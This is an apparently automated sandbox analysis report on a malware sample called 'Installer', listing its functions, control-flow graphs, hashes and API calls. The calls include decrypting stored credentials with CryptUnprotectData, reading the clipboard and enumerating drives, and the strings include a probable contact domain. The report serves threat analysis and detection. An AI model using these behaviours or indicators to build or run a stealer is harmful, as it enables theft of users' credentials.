                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522907777.0000000004FE0000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522934176.0000000004FE2000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_4fe0000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1416286485-0
                                                                                                                                                                                                                                                    • Opcode ID: 84aafcb5b5a6433c750eb38fd26a86e4e74b6fc77f0247bcffa5dad73278fab3
                                                                                                                                                                                                                                                    • Instruction ID: cec12d2198a359d2410d731ba2306c2f27215f87582efa929451e5de5c7e6a75
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 84aafcb5b5a6433c750eb38fd26a86e4e74b6fc77f0247bcffa5dad73278fab3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF216232A042689FD7202B73FD09B7A77ACEF04757F060468FA45DA151FB759C01CAA2
                                                                                                                                                                                                                                                    Function 00415200 Relevance: 16.7, APIs: 1, Strings: 8, Instructions: 927COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 107 415200-415217 108 415220-415228 107->108 108->108 109 41522a-415258 108->109 110 415261 109->110 111 41525a-41525f 109->111 112 415264-4152be call 407fd0 110->112 111->112 115 4152c0-4152e4 112->115 115->115 116 4152e6-4152ee 115->116 117 415311-415321 116->117 118 4152f0-4152f5 116->118 120 415341-415365 call 441c20 117->120 121 415323-41532a 117->121 119 415300-41530f 118->119 119->117 119->119 125 415550-415559 call 407fe0 120->125 126 415563 120->126 127 4153c3-4153cb 120->127 128 4155f2-4155f8 call 407fe0 120->128 129 415576-41558a 120->129 130 4155fb-415623 120->130 131 41556d-415573 call 407fe0 120->131 132 4155ec 120->132 133 41536c-415387 call 441f20 120->133 134 41538e-4153bc call 407fd0 call 441fe0 120->134 122 415330-41533f 121->122 122->120 122->122 125->126 126->131 142 4153d0-4153d8 127->142 128->130 141 415590-4155b4 129->141 137 415625-41562a 130->137 138 41562c 130->138 131->129 133->125 133->126 133->127 133->128 133->129 133->130 133->131 133->134 152 41576c 133->152 134->125 134->126 134->127 134->128 134->129 134->130 134->131 134->152 163 415780 134->163 164 415772-41577b call 407fe0 134->164 146 41562e-415687 call 407fd0 137->146 138->146 141->141 149 4155b6-4155be 141->149 142->142 150 4153da-4153f6 142->150 162 415690-4156e0 146->162 149->132 155 4155c0-4155cf 149->155 156 4153f8-4153fd 150->156 157 4153ff 150->157 160 4155d0-4155d7 155->160 161 415402-415489 call 407fd0 156->161 157->161 165 4155e0-4155e6 160->165 166 4155d9-4155dc 160->166 173 415490-4154d0 161->173 162->162 169 4156e2-4156f0 162->169 180 415855-415857 164->180 165->132 171 415c9f-415cae call 43eba0 165->171 166->160 170 4155de 166->170 176 415711-415721 169->176 177 4156f2-4156f7 169->177 170->132 193 415cb7 171->193 173->173 178 4154d2-4154de 173->178 182 415741-415765 call 441c20 176->182 183 415723-41572a 176->183 181 415700-41570f 177->181 185 415501-415511 178->185 186 4154e0-4154e5 178->186 187 419551-419558 180->187 181->176 181->181 182->152 182->163 182->164 182->180 194 4157c1 182->194 195 415800-41582f call 407fd0 call 441fe0 182->195 196 415844 182->196 197 4157c7-4157f6 call 407fd0 call 441fe0 182->197 198 415786-41578c call 407fe0 182->198 199 415886-415898 182->199 200 41578f-4157ba call 441f20 182->200 201 415838-41583d 182->201 202 41587d-415883 call 407fe0 182->202 203 41585c-415870 call 401000 182->203 188 415730-41573f 183->188 191 415533 185->191 192 415513-41551f 185->192 190 4154f0-4154ff 186->190 188->182 188->188 190->185 190->190 206 415537-41554a call 408a70 191->206 204 415520-41552f 192->204 205 415cba-415cf6 call 407fd0 193->205 195->201 196->180 197->195 198->200 208 4158a0-4158c4 199->208 200->194 200->195 200->196 200->197 200->199 200->201 200->202 200->203 201->196 201->199 201->202 201->203 215 415bb7-415c1f 201->215 216 4159cb-4159cf 201->216 217 415b9a-415b9e 201->217 202->199 203->202 204->204 214 415531 204->214 233 415d00-415d46 205->233 206->125 208->208 221 4158c6-4158ce 208->221 214->206 228 415c20-415c43 215->228 227 4159d0-4159d6 216->227 235 415bab-415bb4 call 407fe0 217->235 231 4158d0-4158df 221->231 232 41590a-415966 call 401a60 221->232 227->227 237 4159d8-4159f7 227->237 228->228 238 415c45-415c5c call 401da0 228->238 239 4158e0-4158e7 231->239 261 415970-4159a4 232->261 233->233 240 415d48-415d50 233->240 235->215 245 4159f9-4159fc 237->245 246 4159fe 237->246 238->199 238->202 238->215 238->216 238->217 238->235 264 415dd6-415ddc call 407fe0 238->264 265 415c69-415c6e 238->265 266 415ddf-415df8 call 440690 238->266 248 4158f0-4158f6 239->248 249 4158e9-4158ec 239->249 250 415d71-415d85 240->250 251 415d52-415d57 240->251 245->246 254 4159ff-415a0b 245->254 246->254 248->232 257 4158f8-415907 call 43eba0 248->257 249->239 256 4158ee 249->256 259 415db3 250->259 260 415d87-415d95 250->260 258 415d60-415d6f 251->258 262 415a12 254->262 263 415a0d-415a10 254->263 256->232 257->232 258->250 258->258 269 415dba-415dd0 call 408a70 259->269 268 415da0-415daf 260->268 261->261 270 4159a6-4159c4 call 401da0 261->270 273 415a13-415a2d call 407fd0 262->273 263->262 263->273 264->266 274 415c70-415c78 265->274 266->187 268->268 276 415db1 268->276 269->264 270->215 270->216 270->217 270->265 287 415a33-415a3a 273->287 288 415b34-415b93 call 440690 CryptUnprotectData 273->288 274->274 282 415c7a-415c96 274->282 276->269 282->193 284 415c98-415c9d 282->284 284->205 290 415a54-415aa0 call 41da20 * 2 287->290 288->215 288->217 288->235 288->264 288->265 288->266 297 415a40-415a4e 290->297 298 415aa2-415ab9 call 41da20 290->298 297->288 297->290 298->297 301 415abb-415aef 298->301 301->297 302 415af5-415b0f call 41da20 301->302 302->297 305 415b15-415b2f 302->305 305->297
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: ("D-$54+*$8"D-$BxBG$U$^123$eH$iiat
                                                                                                                                                                                                                                                    • API String ID: 0-2540653402
                                                                                                                                                                                                                                                    • Opcode ID: ece7e7512deb2f3d0905023b68c116b96d26401af29463b746300dd7e0310da3
                                                                                                                                                                                                                                                    • Instruction ID: 07982f48521f8885066ce7338b4bbbb716ab1cb9c22f471718dbf28f94ce43d7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ece7e7512deb2f3d0905023b68c116b96d26401af29463b746300dd7e0310da3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A5213B5909340CBD7249F24D895BEF77E2FFC5314F08492EE48A8B291E7389841CB96
                                                                                                                                                                                                                                                    Function 00412100 Relevance: 13.0, APIs: 3, Strings: 3, Instructions: 2485COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: 43$R=r$`
                                                                                                                                                                                                                                                    • API String ID: 0-2203821455
                                                                                                                                                                                                                                                    • Opcode ID: e0acb60d089736bb0bc83eef3c2f5b7921e34f4d2e47646672359cc6aa43a476
                                                                                                                                                                                                                                                    • Instruction ID: 43e4bfb613ce475d3ef6dd8407ebf538eeec7cf6cf239a2e9ee7b256e35944b9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e0acb60d089736bb0bc83eef3c2f5b7921e34f4d2e47646672359cc6aa43a476
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9230571D083908FDB10DF38C84579EBFF1AB56310F0982AAD499AB3D2D7788985CB56
                                                                                                                                                                                                                                                    Function 00422E3F Relevance: 11.2, Strings: 8, Instructions: 1220COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: "=B$%! 0$%: !$4$H$de$lev-tolstoi.com$x}}s
                                                                                                                                                                                                                                                    • API String ID: 0-3503028355
                                                                                                                                                                                                                                                    • Opcode ID: 19c0ccc2f21457345f6c989c8bd1b427ac2a30c96d4d5a23cba524a46654f40a
                                                                                                                                                                                                                                                    • Instruction ID: 2d009fd93e7b9374216b3497db79d8202485ae03d753f23917b742f1bf9f436d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19c0ccc2f21457345f6c989c8bd1b427ac2a30c96d4d5a23cba524a46654f40a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41821F75708311CFD324CF28E89176BB7E2EB8A311F59897CE59187391D738A906CB86
                                                                                                                                                                                                                                                    Function 00423D40 Relevance: 11.1, APIs: 3, Strings: 3, Instructions: 551COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 932 423d40-423d95 933 423da0-423df3 932->933 933->933 934 423df5-423e38 RtlExpandEnvironmentStrings 933->934 935 423e40-423e73 934->935 935->935 936 423e75-423e7f 935->936 937 423ff0-423ff9 936->937 938 423fe0-423fe7 936->938 939 423e86-423e8c 936->939 940 4241b6-42425b 936->940 941 423ec5-423ecb call 407fe0 936->941 942 423edb-423ee4 936->942 943 423ece-423eda 936->943 944 423ebd 936->944 947 424002 937->947 948 423ffb-424000 937->948 938->937 949 423e95 939->949 950 423e8e-423e93 939->950 951 424260-424286 940->951 941->943 945 423ee6-423eeb 942->945 946 423eed 942->946 944->941 953 423ef4-423f28 call 407fd0 945->953 946->953 954 424009-4240af call 407fd0 947->954 948->954 955 423e98-423eb6 call 407fd0 RtlExpandEnvironmentStrings 949->955 950->955 951->951 956 424288-424298 call 421b10 951->956 966 423f30-423f63 953->966 967 4240b0-4240e2 954->967 955->937 955->938 955->940 955->941 955->942 955->943 955->944 965 42429d-4242a0 956->965 968 4242b0-4242dc 965->968 966->966 969 423f65-423f6d 966->969 967->967 970 4240e4-4240ec 967->970 968->968 971 4242de-424366 968->971 972 423f91-423f9d 969->972 973 423f6f-423f74 969->973 974 424111-42411d 970->974 975 4240ee-4240f5 970->975 976 424370-424391 971->976 978 423fc1-423fcc call 441da0 972->978 979 423f9f-423fa3 972->979 977 423f80-423f8f 973->977 981 424141-424161 GetLogicalDrives call 441da0 974->981 982 42411f-424123 974->982 980 424100-42410f 975->980 976->976 983 424393-4243b3 call 4216d0 976->983 977->972 977->977 990 423fd1-423fd9 978->990 984 423fb0-423fbf 979->984 980->974 980->980 981->968 991 4244c0 981->991 992 424180-424187 981->992 993 424190-4241a0 981->993 994 4243b6 981->994 995 42417a 981->995 996 424168-424172 981->996 997 4241ae 981->997 986 424130-42413f 982->986 983->994 984->978 984->984 986->981 986->986 990->937 990->938 990->940 991->991 992->993 993->997 999 4243b8-4243e4 994->999 995->992 996->995 997->940 999->999 1000 4243e6-42446f 999->1000 1001 424470-424491 1000->1001 1001->1001 1002 424493-4244b8 call 4216d0 1001->1002 1002->991
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00423E29
                                                                                                                                                                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00423EAB
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                    • String ID: 0M9O$5]=_$y{
                                                                                                                                                                                                                                                    • API String ID: 237503144-4183424673
                                                                                                                                                                                                                                                    • Opcode ID: d1574f89f3c02ea997317bd1e207d191307d53352c373396b29da17b6e90c07b
                                                                                                                                                                                                                                                    • Instruction ID: 3637a5695bacef2f7ae8854d885bc1190330819d14954c5e0cbca8e40a0a3ce6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d1574f89f3c02ea997317bd1e207d191307d53352c373396b29da17b6e90c07b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A02DAB46183409FE314DF65E88166FBBE1FBD1308F44892DE5C58B391EB788906CB56
                                                                                                                                                                                                                                                    Function 004085F0 Relevance: 7.7, APIs: 5, Instructions: 170threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1132 4085f0-408601 call 43e300 1135 4087f0-4087f2 ExitProcess 1132->1135 1136 408607-40860e call 436400 1132->1136 1139 408614-408641 GetCurrentProcessId GetCurrentThreadId 1136->1139 1140 4087d9-4087e0 1136->1140 1141 408643 1139->1141 1142 408645-408649 1139->1142 1143 4087e2-4087e8 call 407fe0 1140->1143 1144 4087eb call 43eb20 1140->1144 1141->1142 1145 40864b 1142->1145 1146 40864d-4086c8 SHGetSpecialFolderPathW 1142->1146 1143->1144 1144->1135 1145->1146 1149 4086d0-4086e4 1146->1149 1149->1149 1151 4086e6-40871a call 43cac0 1149->1151 1154 408720-40873c 1151->1154 1155 408756-408769 GetForegroundWindow 1154->1155 1156 40873e-408754 1154->1156 1157 40879a-4087cd call 409830 1155->1157 1158 40876b-408798 1155->1158 1156->1154 1157->1140 1161 4087cf call 40c590 1157->1161 1158->1157 1163 4087d4 call 40b470 1161->1163 1163->1140
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00408614
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0040861E
                                                                                                                                                                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408696
                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 00408761
                                                                                                                                                                                                                                                      • Part of subcall function 0040B470: FreeLibrary.KERNEL32(004087D9), ref: 0040B476
                                                                                                                                                                                                                                                      • Part of subcall function 0040B470: FreeLibrary.KERNEL32 ref: 0040B497
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 004087F2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3676751680-0
                                                                                                                                                                                                                                                    • Opcode ID: 21594b46850de91b9d7f1fcd097cf3db95484819d6bbf04f7650915a64ff1750
                                                                                                                                                                                                                                                    • Instruction ID: e8cd0a5b1b6602d458645168f9022d0593551acc0d95c8fd4e55ee87bae5c504
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21594b46850de91b9d7f1fcd097cf3db95484819d6bbf04f7650915a64ff1750
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82418DB3B003004BD3186F798D15766B6C79BD5320F1E863EA895EB3DAEE789C054245
                                                                                                                                                                                                                                                    Function 0042C9D4 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 362COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1165 42c9d4-42c9ef 1166 42c9f0-42ca0e 1165->1166 1166->1166 1167 42ca10-42ca17 1166->1167 1168 42ca2b-42ccd8 1167->1168 1169 42ca19-42ca1f 1167->1169 1172 42cce0-42cd23 1168->1172 1170 42ca20-42ca29 1169->1170 1170->1168 1170->1170 1172->1172 1173 42cd25-42cd2c 1172->1173 1174 42cd4b-42cd57 1173->1174 1175 42cd2e-42cd32 1173->1175 1177 42cd71-42cd8f call 440690 1174->1177 1178 42cd59-42cd5b 1174->1178 1176 42cd40-42cd49 1175->1176 1176->1174 1176->1176 1181 42cd94-42cdc9 GetPhysicallyInstalledSystemMemory 1177->1181 1180 42cd60-42cd6d 1178->1180 1180->1180 1182 42cd6f 1180->1182 1183 42cdd0-42cdf2 1181->1183 1182->1177 1183->1183 1184 42cdf4-42ce35 call 41e540 1183->1184 1187 42ce40-42ce5c 1184->1187 1187->1187 1188 42ce5e-42ce65 1187->1188 1189 42ce67-42ce6b 1188->1189 1190 42ce7b-42ce83 1188->1190 1191 42ce70-42ce79 1189->1191 1192 42ce85-42ce86 1190->1192 1193 42ce9b-42cea8 1190->1193 1191->1190 1191->1191 1194 42ce90-42ce99 1192->1194 1195 42ceaa-42ceb1 1193->1195 1196 42cecb-42cf1a 1193->1196 1194->1193 1194->1194 1197 42cec0-42cec9 1195->1197 1198 42cf20-42cf34 1196->1198 1197->1196 1197->1197 1198->1198 1199 42cf36-42cf3d 1198->1199 1200 42cf5b-42cf68 1199->1200 1201 42cf3f-42cf43 1199->1201 1203 42cf6a-42cf71 1200->1203 1204 42cf8b-42d03d 1200->1204 1202 42cf50-42cf59 1201->1202 1202->1200 1202->1202 1205 42cf80-42cf89 1203->1205 1205->1204 1205->1205
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: OEpz$QFD3$rj
                                                                                                                                                                                                                                                    • API String ID: 0-3969983622
                                                                                                                                                                                                                                                    • Opcode ID: 578df49152ec6977c0559d99d18d55f56bbe5c8ef7ba284d461e40d52f2b5091
                                                                                                                                                                                                                                                    • Instruction ID: 76e3eab801afa7748f5422476167f4aa7a66d4a79f7629f79f88f53e2f4321bc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 578df49152ec6977c0559d99d18d55f56bbe5c8ef7ba284d461e40d52f2b5091
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AEA1047060C3D18ED3298F2994A03BBBFE19FA7304F58586EE0C997392D7798905CB56
                                                                                                                                                                                                                                                    Function 0042CCA2 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 334COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1206 42cca2-42ccd8 call 433150 call 407fe0 1212 42cce0-42cd23 1206->1212 1212->1212 1213 42cd25-42cd2c 1212->1213 1214 42cd4b-42cd57 1213->1214 1215 42cd2e-42cd32 1213->1215 1217 42cd71-42cdc9 call 440690 GetPhysicallyInstalledSystemMemory 1214->1217 1218 42cd59-42cd5b 1214->1218 1216 42cd40-42cd49 1215->1216 1216->1214 1216->1216 1223 42cdd0-42cdf2 1217->1223 1220 42cd60-42cd6d 1218->1220 1220->1220 1222 42cd6f 1220->1222 1222->1217 1223->1223 1224 42cdf4-42ce35 call 41e540 1223->1224 1227 42ce40-42ce5c 1224->1227 1227->1227 1228 42ce5e-42ce65 1227->1228 1229 42ce67-42ce6b 1228->1229 1230 42ce7b-42ce83 1228->1230 1231 42ce70-42ce79 1229->1231 1232 42ce85-42ce86 1230->1232 1233 42ce9b-42cea8 1230->1233 1231->1230 1231->1231 1234 42ce90-42ce99 1232->1234 1235 42ceaa-42ceb1 1233->1235 1236 42cecb-42cf1a 1233->1236 1234->1233 1234->1234 1237 42cec0-42cec9 1235->1237 1238 42cf20-42cf34 1236->1238 1237->1236 1237->1237 1238->1238 1239 42cf36-42cf3d 1238->1239 1240 42cf5b-42cf68 1239->1240 1241 42cf3f-42cf43 1239->1241 1243 42cf6a-42cf71 1240->1243 1244 42cf8b-42d03d 1240->1244 1242 42cf50-42cf59 1241->1242 1242->1240 1242->1242 1245 42cf80-42cf89 1243->1245 1245->1244 1245->1245
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetPhysicallyInstalledSystemMemory.KERNEL32(?), ref: 0042CD9C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                                                                    • String ID: OEpz$QFD3$rj
                                                                                                                                                                                                                                                    • API String ID: 3960555810-3969983622
                                                                                                                                                                                                                                                    • Opcode ID: 9168ce1b262d27504dede28803dc24f1866231d49f4ce974e861d94e91dd2d20
                                                                                                                                                                                                                                                    • Instruction ID: 843eda79264cd3607644ba2c6e9f51ffbc4283e049ce5635c5debb878d24e918
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9168ce1b262d27504dede28803dc24f1866231d49f4ce974e861d94e91dd2d20
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E591157060C3D18ED3298F2994A03EBBFE1AF97304F58486EE0C997392D7798905CB56
                                                                                                                                                                                                                                                    Function 00409370 Relevance: 5.4, Strings: 4, Instructions: 371COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1346 409370-40937e 1347 409384-4093ef call 405e80 call 407fd0 1346->1347 1348 4097d7 1346->1348 1354 4093f0-409436 1347->1354 1350 4097d9-4097e5 1348->1350 1354->1354 1355 409438-40945b call 408d10 1354->1355 1358 409460-409485 1355->1358 1358->1358 1359 409487-4094a4 call 408d10 1358->1359 1362 4094b0-4094ce 1359->1362 1362->1362 1363 4094d0-409505 call 408d10 1362->1363 1366 409510-40955f 1363->1366 1366->1366 1367 409561-40956b 1366->1367 1368 409570-4095a1 1367->1368 1368->1368 1369 4095a3-4095c8 call 408d10 1368->1369 1372 4095d0-4095e4 1369->1372 1372->1372 1373 4095e6-4096ae call 408f90 1372->1373 1376 4096b0-4096e3 1373->1376 1376->1376 1377 4096e5-4096ed 1376->1377 1378 409711-40971c 1377->1378 1379 4096ef-4096f7 1377->1379 1380 409741-40976f 1378->1380 1381 40971e-409721 1378->1381 1382 409700-40970f 1379->1382 1384 409770-409798 1380->1384 1383 409730-40973f 1381->1383 1382->1378 1382->1382 1383->1380 1383->1383 1384->1384 1385 40979a-4097af call 40bd10 1384->1385 1387 4097b4-4097d5 call 407fe0 1385->1387 1387->1350
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: ,-$4EAC7AD5F775DFB71441EDD8E05CE3DA$T$g*V9
                                                                                                                                                                                                                                                    • API String ID: 0-1073015448
                                                                                                                                                                                                                                                    • Opcode ID: 86bf961c395ed7b7e07ea05ad14cc24c126058a6d268732374085c02ea76dcbd
                                                                                                                                                                                                                                                    • Instruction ID: a0ce2b4ea5d82b238d504246632dfdecb4304a147a1c54da40f31a80d191d4bf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 86bf961c395ed7b7e07ea05ad14cc24c126058a6d268732374085c02ea76dcbd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ADC135B16083408BD718CF35C891A6BBBE5EFC2304F14496DE5D29B392DB38D90ACB56
                                                                                                                                                                                                                                                    Function 00433B7A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1391 433b7a-433c5b call 414690 GetSystemMetrics * 2 1399 433c62-433cf6 1391->1399
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: MetricsSystem
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                    • Opcode ID: 66b7d6ddbbaea78e25287b155da9d8360f6552616883599e2b0a62f41b2dcca0
                                                                                                                                                                                                                                                    • Instruction ID: 01f348f677623f89764fea340cc94f5095fd4e31d5590f1ad9612ee75e4100da
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66b7d6ddbbaea78e25287b155da9d8360f6552616883599e2b0a62f41b2dcca0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E05172B4D142089FCB40EFACD98569DBBF0BB88300F11852AE498E7310D774A984CF96
                                                                                                                                                                                                                                                    Function 0040D7CF Relevance: 4.8, APIs: 1, Strings: 2, Instructions: 338COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
